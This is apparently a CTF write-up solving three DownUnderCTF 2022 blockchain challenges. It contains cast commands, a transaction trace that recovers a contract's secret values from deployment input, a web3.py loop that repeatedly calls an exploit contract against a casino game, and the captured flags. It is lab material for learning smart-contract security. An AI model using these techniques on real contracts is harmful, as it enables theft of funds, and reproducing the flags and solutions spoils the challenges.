Foundry Setup Example
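# Foundry/cast environment for the challenge instance (RPC endpoint, player key and
# deployed contract address as handed out by the CTF infrastructure).
export FOUNDRY_ETH_RPC_URL=https://blockchain-secretandephemeral-8ea1a06ad5bc87ae-eth.2022.ductf.dev/
export PRIVATE_KEY=0x352b2b84acd9b65588c1c04b8cd0130b883b800ec1219af08e892757578acd19
export INSTANCE_ADDRESS=0x6E4198C61C75D1B4D1cbcd00707aAC7d76867cF8
# Quote the expansions and use ${VAR:?} so an unset/empty value aborts with a message
# instead of silently shifting the remaining arguments into the wrong positions.
# NB: a key passed on argv is visible in `ps` output and shell history; for anything
# beyond a throwaway CTF instance prefer a keystore or cast's --interactive prompt.
cast send --legacy --private-key "${PRIVATE_KEY:?}" "${INSTANCE_ADDRESS:?}" "solveChallenge()"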
Flag: DUCTF{muM_1_did_a_blonkchain!}
$ cast block 4
baseFeePerGas
difficulty 2
extraData 0xd883010a19846765746888676f312e31382e36856c696e757800000000000000b4f6ccd7a57c8c26496d51884d640d12eaa1b9089aa6ccb2f88e41fa38369ecb2caab38c54300e3630bd9c9c453b1e61bed287940ce19021e98b658749ce398201
gasLimit 4718380
gasUsed 412467
hash 0x1f055892ea28c97622af29d88cc2e08d330d51fa71ba363d8a9e4d300b31f1fa
logsBloom 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
miner 0x0000000000000000000000000000000000000000
mixHash 0x0000000000000000000000000000000000000000000000000000000000000000
nonce 0x0000000000000000
number 4
parentHash 0x12813305017ea5a2ff9478d6ff33e6f0ded7634e3b0058cd8097c311de053803
receiptsRoot 0x2b6c5345a4e411cdc4903d21da6b4eacb15be1c4c5866316349ba632e9b75af2
sealFields []
sha3Uncles 0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347
size 2758
stateRoot 0xc93ef167d6a398a32d51910c8cc97645c63f0949e3767a2c853a81dc63fc71a1
timestamp 1664346293
totalDifficulty 9
transactions: [
0x33252839d47608a1259bfe12910fdb699dd1cb2c695804ce483b870688718582
0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f
]
$ cast tx 0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f
blockHash 0x1f055892ea28c97622af29d88cc2e08d330d51fa71ba363d8a9e4d300b31f1fa
blockNumber 4
from 0x7BCF8A237e5d8900445C148FC2b119670807575b
gas 391467
gasPrice 1000000000
hash 0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f
input 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
nonce 1
r 0xcf50c8e0ed100baae3b31d69e45e7498caec66478e5ed9d884c3cedec6a14f82
s 0x73ebe87f3541c26669adf9ef18e665f47f1a30796f8f4b7162795099807f7e5a
to
transactionIndex 1
v 62710
value 0
input.txt
:
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
$ erever -f src/DownUnderCTF2022/SecretAndEphemeral/input.txt --trace | grep KECCAK256 -A 2
0x1a7: KECCAK256(offset:0x00, size:0x20)
input 0000000000000000000000000000000000000000000000000000000000000003
stack [0xc2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85b, 0x00, 0x01, 0x20, 0x20, 0x22, 0x03, 0x0160, 0x63, 0x03, 0x0dec0ded, 0x0160]
--
0x30f: KECCAK256(offset:0x00, size:0x20)
input 0000000000000000000000000000000000000000000000000000000000000003
stack [0xc2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85b, 0x20, 0x01, 0x01, 0x22, 0x45, 0x00, 0x00, 0x0200, 0x00, 0x0dec0ded, 0x03, 0x7a, 0x0dec0ded, 0x0160]
--
0x090: KECCAK256(offset:0x0200, size:0x56)
input 736f20616e79776179732069206a757374207374617274656420626c617374696e67000000000000000000000000000000000000000000000000000000000dec0ded0000000000000000000000000000000000000000
stack [0x6d824e64b8b76112000b269b31bda718c9c7d489babeaf84a2dcd3c91a329309, 0x0dec0ded, 0x0160]
not_yours
: 0x736f20616e79776179732069206a757374207374617274656420626c617374696e67
(so anyways i just started blasting)
secret_number
: 0x000000000000000000000000000000000000000000000000000000000dec0ded
owner
: 0x7BCF8A237e5d8900445C148FC2b119670807575b
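# Replay the values recovered from the deployment transaction input above: the
# not_yours string, secret_number (0x0dec0ded == 233573869) and the owner address.
# Expansions are quoted / ${VAR:?}-guarded so a missing env var fails loudly rather
# than shifting the positional arguments.
cast send --legacy --private-key "${PRIVATE_KEY:?}" "${INSTANCE_ADDRESS:?}" \
  "retrieveTheFunds(string,uint256,address)" \
  "so anyways i just started blasting" 233573869 0x7BCF8A237e5d8900445C148FC2b119670807575b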
Flag: DUCTF{u_r_a_web3_t1me_7raveler_:)}
from web3 import Web3
import json
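# Connection and signing parameters for the Crypto Casino instance (values as handed
# out by the CTF infrastructure).
w3 = Web3(Web3.HTTPProvider('https://blockchain-cryptocasino-468129ee23c33222-eth.2022.ductf.dev:443/'))
# Hard-coded key is fine for a throwaway CTF instance only; real tooling should read
# it from the environment or a keystore rather than committing it to source.
private_key = "0x489ada60affa1f5aa99353561a85020570dd5163e5decaf7fec93072376289f3"
player_address = "0x801da62Bf5bB02Da223147E13010025Bc841800A"
# Load the ABI from Foundry's build artifact. `with` closes the file handle, which
# the original json.load(open(...)) form never did.
with open("out/Exploit.sol/Exploit.json") as artifact:
    exploit_abi = json.load(artifact)["abi"]
exploit = w3.eth.contract(address="0xFAa598083775387feC2D170EB85055C420B97b20", abi=exploit_abi)
chain_id = 31337
gas_limit = 2000000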
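def send(function):
    """Sign and submit a contract call, then block until it is mined.

    Args:
        function: a bound web3 ContractFunction (e.g. ``exploit.functions.exploit()``).

    Returns:
        The transaction receipt returned by ``wait_for_transaction_receipt``; the
        caller inspects ``receipt["status"]``.
    """
    # gasPrice-style (legacy) transaction; the nonce is re-read on every call so
    # repeated sends from the same account stay sequential.
    txn = function.build_transaction({
        'chainId': chain_id,
        'gas': gas_limit,
        'gasPrice': w3.toWei('1', 'gwei'),
        'nonce': w3.eth.getTransactionCount(player_address),
    })
    signed_txn = w3.eth.account.sign_transaction(txn, private_key=private_key)
    # send_raw_transaction already returns the transaction hash, so re-deriving it
    # with keccak over the raw bytes (as the original did) is redundant.
    tx_hash = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    return w3.eth.wait_for_transaction_receipt(tx_hash)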
# Fire the exploit call repeatedly and print each receipt's status so a successful
# round is visible in the output.
for _ in range(100):
    tx_receipt = send(exploit.functions.exploit())
    status = tx_receipt["status"]
    print(status)
Flag: DUCTF{sh0uldv3_us3d_a_vrf??}